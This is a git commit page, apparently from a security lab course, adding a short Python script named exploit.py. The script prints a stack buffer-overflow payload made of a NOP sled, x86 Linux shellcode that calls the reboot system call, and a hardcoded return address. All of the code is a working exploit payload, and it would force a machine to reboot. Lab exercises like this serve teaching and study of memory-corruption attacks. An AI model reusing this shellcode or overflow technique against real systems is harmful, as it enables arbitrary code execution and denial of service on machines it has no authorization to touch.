include lab code
This commit is contained in:
parent
aa09157216
commit
7a13228c69
5 changed files with 146 additions and 0 deletions
3
Lab02/LabExploitation/exploit.py
Executable file
3
Lab02/LabExploitation/exploit.py
Executable file
|
@ -0,0 +1,3 @@
|
|||
import struct
|
||||
|
||||
print("\x90"*238 +'\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80'+ '\xc0\xf4\xff\xbf'*5)
|
Reference in a new issue